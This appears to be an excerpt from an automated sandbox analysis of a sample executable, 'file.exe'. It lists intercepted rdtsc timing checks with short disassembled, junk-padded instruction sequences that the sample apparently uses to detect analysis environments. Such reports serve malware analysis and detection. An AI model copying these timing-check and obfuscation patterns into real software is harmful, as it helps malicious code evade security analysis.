                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52386A second address: 52386E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523983 second address: 523992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71BFAh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523C36 second address: 523C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E31393h 0x00000007 jmp 00007F8480E3138Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523C58 second address: 523C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8480C71C06h 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F8480C71BF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525658 second address: 3A1BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xor dword ptr [esp], 6C7E06CDh 0x0000000d push ecx 0x0000000e sub dword ptr [ebp+122D214Fh], ecx 0x00000014 pop ecx 0x00000015 push dword ptr [ebp+122D019Dh] 0x0000001b push edx 0x0000001c mov ecx, 0491D081h 0x00000021 pop edx 0x00000022 call dword ptr [ebp+122D19B7h] 0x00000028 pushad 0x00000029 cld 0x0000002a xor eax, eax 0x0000002c pushad 0x0000002d mov eax, 586B7E9Bh 0x00000032 mov ebx, dword ptr [ebp+122D2AF3h] 0x00000038 popad 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d sub dword ptr [ebp+122D275Ch], eax 0x00000043 mov dword ptr [ebp+122D2A63h], eax 0x00000049 mov dword ptr [ebp+122D275Ch], edx 0x0000004f mov esi, 0000003Ch 0x00000054 mov dword ptr [ebp+122D275Ch], edx 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e js 00007F8480E3138Ch 0x00000064 mov dword ptr [ebp+122D275Ch], esi 0x0000006a lodsw 0x0000006c mov dword ptr [ebp+122D275Ch], ebx 0x00000072 je 00007F8480E31390h 0x00000078 pushad 0x00000079 push edi 0x0000007a pop edx 0x0000007b jg 00007F8480E31386h 0x00000081 popad 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 add dword ptr [ebp+122D275Ch], edx 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 jno 00007F8480E3138Dh 0x00000096 nop 0x00000097 push eax 0x00000098 push edx 0x00000099 pushad 0x0000009a jmp 00007F8480E3138Ah 0x0000009f jnc 00007F8480E31386h 0x000000a5 popad 0x000000a6 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52568E second address: 525692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525692 second address: 52571E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8480E31386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8480E3138Bh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 mov dword ptr [ebp+122D1AA9h], esi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F8480E31388h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 call 00007F8480E31389h 0x0000003e push esi 0x0000003f jg 00007F8480E3138Ch 0x00000045 pop esi 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 jmp 00007F8480E3138Dh 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 popad 0x00000051 jnl 00007F8480E3138Ch 0x00000057 popad 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c pushad 0x0000005d jl 00007F8480E31388h 0x00000063 pushad 0x00000064 popad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52571E second address: 525730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F8480C71BF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525730 second address: 525736 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525736 second address: 52575A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8480C71BF6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push edx 0x00000014 jo 00007F8480C71BF6h 0x0000001a pop edx 0x0000001b pushad 0x0000001c jng 00007F8480C71BF6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52575A second address: 5257BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F8480E3138Fh 0x0000000c push 00000003h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F8480E31388h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b sbb di, 33CDh 0x00000030 pop ecx 0x00000031 push 00000003h 0x00000033 cmc 0x00000034 push 91C8B8E6h 0x00000039 push eax 0x0000003a push edx 0x0000003b jnp 00007F8480E31395h 0x00000041 jmp 00007F8480E3138Fh 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5257BE second address: 525805 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8480C71BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 2E37471Ah 0x00000013 jmp 00007F8480C71C06h 0x00000018 lea ebx, dword ptr [ebp+12457594h] 0x0000001e or dword ptr [ebp+1245280Bh], esi 0x00000024 xchg eax, ebx 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F8480C71BFDh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5258A1 second address: 5258A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5258A7 second address: 525932 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F8480C71BF6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push esi 0x00000010 mov esi, ecx 0x00000012 pop edx 0x00000013 push 00000000h 0x00000015 add dword ptr [ebp+122D343Ah], edi 0x0000001b jmp 00007F8480C71C07h 0x00000020 push 4B945DF1h 0x00000025 jmp 00007F8480C71C06h 0x0000002a xor dword ptr [esp], 4B945D71h 0x00000031 call 00007F8480C71BFDh 0x00000036 mov esi, dword ptr [ebp+122D19B7h] 0x0000003c pop ecx 0x0000003d push 00000003h 0x0000003f mov esi, dword ptr [ebp+122D214Fh] 0x00000045 push 00000000h 0x00000047 mov dl, E2h 0x00000049 push 00000003h 0x0000004b mov si, dx 0x0000004e call 00007F8480C71BF9h 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jg 00007F8480C71BF6h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525932 second address: 5259BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F8480E31393h 0x00000012 jmp 00007F8480E3138Bh 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F8480E3138Bh 0x00000021 mov eax, dword ptr [eax] 0x00000023 push esi 0x00000024 jmp 00007F8480E31390h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e ja 00007F8480E3138Eh 0x00000034 pop eax 0x00000035 mov dx, D576h 0x00000039 add ecx, 17622E91h 0x0000003f lea ebx, dword ptr [ebp+1245759Dh] 0x00000045 or dword ptr [ebp+122D3432h], ebx 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d jmp 00007F8480E3138Fh 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259BF second address: 5259C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259C3 second address: 5259C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259C7 second address: 5259D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259D6 second address: 5259DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525A61 second address: 525AB1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 call 00007F8480C71BFFh 0x00000017 add di, 8F22h 0x0000001c pop edx 0x0000001d push 00000000h 0x0000001f mov ch, 4Bh 0x00000021 push edx 0x00000022 movsx edx, dx 0x00000025 pop edi 0x00000026 push AD5D9480h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8480C71C09h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525AB1 second address: 525B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8480E31386h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 52A26C00h 0x00000015 mov dword ptr [ebp+122D2F22h], eax 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F8480E31388h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov edi, esi 0x00000039 push 00000000h 0x0000003b pushad 0x0000003c jne 00007F8480E31393h 0x00000042 mov dword ptr [ebp+122D217Bh], edx 0x00000048 popad 0x00000049 push 00000003h 0x0000004b push edi 0x0000004c jp 00007F8480E3138Ch 0x00000052 pop edx 0x00000053 push C42B2218h 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F8480E31399h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525B3A second address: 525BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F8480C71BF6h 0x00000009 jmp 00007F8480C71C09h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 042B2218h 0x00000018 xor dword ptr [ebp+122D1FDAh], ebx 0x0000001e lea ebx, dword ptr [ebp+124575A8h] 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F8480C71BF8h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 jmp 00007F8480C71C04h 0x00000045 jmp 00007F8480C71C00h 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F8480C71C08h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525BD9 second address: 525BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480E31391h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537934 second address: 53795E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8480C71C03h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F8480C71BFCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53795E second address: 537963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547CA1 second address: 547CD1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8480C71BFAh 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8480C71C03h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547CD1 second address: 547CD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545F1F second address: 545F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546342 second address: 54634C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8480E31386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54634C second address: 54635A instructions: 0x00000000 rdtsc 0x00000002 je 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54635A second address: 54635E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5464BE second address: 5464D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8480C71C01h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546767 second address: 546771 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8480E31386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546880 second address: 54688A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5469DE second address: 546A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 je 00007F8480E31386h 0x0000000e pop esi 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8480E31391h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546A03 second address: 546A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546CA4 second address: 546CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510A05 second address: 510A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510A0B second address: 510A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F8480E31388h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 jno 00007F8480E31386h 0x00000016 js 00007F8480E31386h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546DEB second address: 546DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546DEF second address: 546E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8480E31386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F8480E31398h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546E1E second address: 546E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71C00h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8480C71BFDh 0x00000012 jbe 00007F8480C71BF8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546E4B second address: 546E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8480E31386h 0x0000000a jnp 00007F8480E31386h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547695 second address: 54769B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54769B second address: 5476A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547B0D second address: 547B13 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D042 second address: 54D047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D047 second address: 54D064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71C07h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0CE second address: 54F0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0D4 second address: 54F0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F52F second address: 54F56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480E31394h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8480E31398h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F56C second address: 54F581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F581 second address: 54F587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E614 second address: 54E628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jbe 00007F8480C71BF6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F7AB second address: 54F7B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F8DB second address: 54F8DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555E45 second address: 555E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8480E31386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555E4F second address: 555E7E instructions: 0x00000000 rdtsc 0x00000002 je 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F8480C71C0Dh 0x00000010 jmp 00007F8480C71C07h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5565D8 second address: 5565E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F8480E31386h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5565E4 second address: 556605 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007F8480C71BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8480C71C01h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556605 second address: 556621 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8480E31392h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556621 second address: 556627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557023 second address: 557027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55727D second address: 5572CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8480C71C0Ch 0x0000000f jmp 00007F8480C71C06h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007F8480C71C05h 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007F8480C71BF6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55736E second address: 557376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557376 second address: 557383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557383 second address: 557389 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557389 second address: 5573A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480C71C03h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557B39 second address: 557B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F8480E31386h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557B88 second address: 557BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F8480C71BF8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D1A41h], edx 0x0000002c push eax 0x0000002d push edi 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557E24 second address: 557E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557E28 second address: 557E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558077 second address: 55807C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
